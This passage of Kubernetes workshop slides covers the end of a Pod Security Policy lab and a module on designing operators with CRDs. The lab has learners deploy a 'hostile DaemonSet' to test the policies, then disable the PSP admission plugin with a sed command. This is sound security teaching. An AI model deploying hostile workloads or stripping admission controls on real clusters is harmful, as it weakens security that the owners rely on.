.debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Trying to hack the cluster - Let's create the same DaemonSet we used earlier .exercise[ - Create a hostile DaemonSet: ```bash kubectl create -f ~/container.training/k8s/hacktheplanet.yaml ``` - Look at the state of the namespace: ```bash kubectl get all ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- class: extra-details ## What's in our restricted policy? - The restricted PSP is similar to the one provided in the docs, but: - it allows containers to run as root - it doesn't drop capabilities - Many containers run as root by default, and would require additional tweaks - Many containers use e.g. `chown`, which requires a specific capability (that's the case for the NGINX official image, for instance) - We still block: hostPath, privileged containers, and much more! .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- class: extra-details ## The case of static pods - If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing - However, the API server is obviously running (otherwise, `kubectl get pods --namespace=kube-system` wouldn't work) - The API server Pod is created directly by kubelet (without going through the PSP admission plugin) - Then, kubelet creates a "mirror pod" representing that Pod in etcd - That "mirror pod" creation goes through the PSP admission plugin - And it gets blocked! - This can be fixed by binding `psp:privileged` to group `system:nodes` .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## .warning[Before moving on...] - Our cluster is currently broken (we can't create pods in namespaces kube-system, default, ...) - We need to either: - disable the PSP admission plugin - allow use of PSP to relevant users and groups - For instance, we could: - bind `psp:restricted` to the group `system:authenticated` - bind `psp:privileged` to the ServiceAccount `kube-system:default` .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Fixing the cluster - Let's disable the PSP admission plugin .exercise[ - Edit the Kubernetes API server static pod manifest - Remove the PSP admission plugin - This can be done with this one-liner: ```bash sudo sed -i s/,PodSecurityPolicy// /etc/kubernetes/manifests/kube-apiserver.yaml ``` ] ??? :EN:- Preventing privilege escalation with Pod Security Policies :FR:- Limiter les droits des conteneurs avec les *Pod Security Policies* .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/container-cranes.jpg)] --- name: toc-designing-an-operator class: title Designing an operator .nav[ [Previous section](#toc-pod-security-policies) | [Back to table of contents](#toc-module-5) | [Next section](#toc-) ] .debug[(automatically generated title slide)] --- # Designing an operator - Once we understand CRDs and operators, it's tempting to use them everywhere - Yes, we can do (almost) everything with operators ... - ... But *should we?* - Very often, the answer is **“no!”** - Operators are powerful, but significantly more complex than other solutions .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## When should we (not) use operators? - Operators are great if our app needs to react to cluster events (nodes or pods going down, and requiring extensive reconfiguration) - Operators *might* be helpful to encapsulate complexity (manipulate one single custom resource for an entire stack) - Operators are probably overkill if a Helm chart would suffice - That being said, if we really want to write an operator ... Read on! .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## What does it take to write an operator? - Writing a quick-and-dirty operator, or a POC/MVP, is easy - Writing a robust operator is hard - We will describe the general idea - We will identify some of the associated challenges - We will list a few tools that can help us .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Top-down vs. bottom-up - Both approaches are possible - Let's see what they entail, and their respective pros and cons .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Top-down approach - Start with high-level design (see next slide) - Pros: - can yield cleaner design that will be more robust - Cons: - must be able to anticipate all the events that might happen - design will be better only to the extent of what we anticipated - hard to anticipate if we don't have production experience .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## High-level design - What are we solving? (e.g.: geographic databases backed by PostGIS with Redis caches) - What are our use-cases, stories? (e.g.: adding/resizing caches and read replicas; load balancing queries) - What kind of outage do we want to address? (e.g.: loss of individual node, pod, volume) - What are our *non-features*, the things we don't want to address? (e.g.: loss of datacenter/zone; differentiating between read and write queries;
cache invalidation; upgrading to newer major versions of Redis, PostGIS, PostgreSQL) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Low-level design - What Custom Resource Definitions do we need? (one, many?) - How will we store configuration information? (part of the CRD spec fields, annotations, other?) - Do we need to store state? If so, where? - state that is small and doesn't change much can be stored via the Kubernetes API
(e.g.: leader information, configuration, credentials) - things that are big and/or change a lot should go elsewhere
(e.g.: metrics, bigger configuration file like GeoIP) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- class: extra-details ## What can we store via the Kubernetes API? - The API server stores most Kubernetes resources in etcd - Etcd is designed for reliability, not for performance - If our storage needs exceed what etcd can offer, we need to use something else: - either directly - or by extending the API server
(for instance by using the agregation layer, like [metrics server](https://github.com/kubernetes-incubator/metrics-server) does) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Bottom-up approach - Start with existing Kubernetes resources (Deployment, Stateful Set...) - Run the system in production - Add scripts, automation, to facilitate day-to-day operations - Turn the scripts into an operator - Pros: simpler to get started; reflects actual use-cases - Cons: can result in convoluted designs requiring extensive refactor .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## General idea - Our operator will watch its CRDs *and associated resources* - Drawing state diagrams and finite state automata helps a lot - It's OK if some transitions lead to a big catch-all "human intervention" - Over time, we will learn about new failure modes and add to these diagrams - It's OK to start with CRD creation / deletion and prevent any modification (that's the easy POC/MVP we were talking about) - *Presentation* and *validation* will help our users (more on that later) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Challenges - Reacting to infrastructure disruption can seem hard at first - Kubernetes gives us a lot of primitives to help: - Pods and Persistent Volumes will *eventually* recover - Stateful Sets give us easy ways to "add N copies" of a thing - The real challenges come with configuration changes (i.e., what to do when our users update our CRDs) - Keep in mind that [some] of the [largest] cloud [outages] haven't been caused by [natural catastrophes], or even code bugs, but by configuration changes [some]: https://www.datacenterdynamics.com/news/gcp-outage-mainone-leaked-google-cloudflare-ip-addresses-china-telecom/ [largest]: https://aws.amazon.com/message/41926/ [outages]: https://aws.amazon.com/message/65648/ [natural catastrophes]: https://www.datacenterknowledge.com/amazon/aws-says-it-s-never-seen-whole-data-center-go-down .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Configuration changes - It is helpful to analyze and understand how Kubernetes controllers work: - watch resource for modifications - compare desired state (CRD) and current state - issue actions to converge state - Configuration changes will probably require *another* state diagram or FSA - Again, it's OK to have transitions labeled as "unsupported" (i.e. reject some modifications because we can't execute them) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Tools - CoreOS / RedHat Operator Framework [GitHub](https://github.com/operator-framework) | [Blog](https://developers.redhat.com/blog/2018/12/18/introduction-to-the-kubernetes-operator-framework/) | [Intro talk](https://www.youtube.com/watch?v=8k_ayO1VRXE) | [Deep dive talk](https://www.youtube.com/watch?v=fu7ecA2rXmc) | [Simple example](https://medium.com/faun/writing-your-first-kubernetes-operator-8f3df4453234) - Zalando Kubernetes Operator Pythonic Framework (KOPF) [GitHub](https://github.com/zalando-incubator/kopf) | [Docs](https://kopf.readthedocs.io/) | [Step-by-step tutorial](https://kopf.readthedocs.io/en/stable/walkthrough/problem/) - Mesosphere Kubernetes Universal Declarative Operator (KUDO) [GitHub](https://github.com/kudobuilder/kudo) | [Blog](https://mesosphere.com/blog/announcing-maestro-a-declarative-no-code-approach-to-kubernetes-day-2-operators/) | [Docs](https://kudo.dev/) | [Zookeeper example](https://github.com/kudobuilder/frameworks/tree/master/repo/stable/zookeeper) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Validation - By default, a CRD is "free form" (we can put pretty much anything we want in it) - When creating a CRD, we can provide an OpenAPI v3 schema ([Example](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml#L34)) - The API server will then validate resources created/edited with this schema - If we need a stronger validation, we can use a Validating Admission Webhook: - run an [admission webhook server](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/#write-an-admission-webhook-server) to receive validation requests - register the webhook by creating a [ValidatingWebhookConfiguration](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/#configure-admission-webhooks-on-the-fly) - each time the API server receives a request matching the configuration,
the request is sent to our server for validation .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Presentation - By default, `kubectl get mycustomresource` won't display much information (just the name and age of each resource) - When creating a CRD, we can specify additional columns to print ([Example](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml#L6), [Docs](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/#additional-printer-columns)) - By default, `kubectl describe mycustomresource` will also be generic - `kubectl describe` can show events related to our custom resources (for that, we need to create Event resources, and fill the `involvedObject` field) - For scalable resources, we can define a `scale` sub-resource - This will enable the use of `kubectl scale` and other scaling-related operations .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## About scaling - It is possible to use the HPA (Horizontal Pod Autoscaler) with CRDs - But it is not always desirable - The HPA works very well for homogenous, stateless workloads - For other workloads, your mileage may vary - Some systems can scale across multiple dimensions (for instance: increase number of replicas, or number of shards?) - If autoscaling is desired, the operator will have to take complex decisions (example: Zalando's Elasticsearch Operator ([Video](https://www.youtube.com/watch?v=lprE0J0kAq0))) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Versioning - As our operator evolves over time, we may have to change the CRD (add, remove, change fields) - Like every other resource in Kubernetes, [custom resources are versioned](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definition-versioning/ ) - When creating a CRD, we need to specify a *list* of versions - Versions can be marked as `stored` and/or `served` .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Stored version - Exactly one version has to be marked as the `stored` version - As the name implies, it is the one that will be stored in etcd - Resources in storage are never converted automatically (we need to read and re-write them ourselves) - Yes, this means that we can have different versions in etcd at any time - Our code needs to handle all the versions that still exist in storage .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Served versions - By default, the Kubernetes API will serve resources "as-is" (using their stored version) - It will assume that all versions are compatible storage-wise (i.e. that the spec and fields are compatible between versions) - We can provide [conversion webhooks](https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definition-versioning/#webhook-conversion) to "translate" requests (the alternative is to upgrade all stored resources and stop serving old versions) .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Operator reliability - Remember that the operator itself must be resilient (e.g.: the node running it can fail) - Our operator must be able to restart and recover gracefully - Do not store state locally (unless we can reconstruct that state when we restart) - As indicated earlier, we can use the Kubernetes API to store data: - in the custom resources themselves - in other resources' annotations .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)] --- ## Beyond CRDs - CRDs cannot use custom storage (e.g. for time series data) - CRDs cannot support arbitrary subresources (like logs or exec for Pods) - CRDs cannot support protobuf (for faster, more efficient communication) - If we need these things, we can use the [aggregation layer](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) instead - The aggregation layer proxies all requests below a specific path to another server (this is used e.g. by the metrics server) - [This documentation page](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/custom-resources/#choosing-a-method-for-adding-custom-resources) compares the features of CRDs and API aggregation ??? :EN:- Guidelines to design our own operators :FR:- Comment concevoir nos propres opérateurs .debug[[k8s/operators-design.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/operators-design.md)]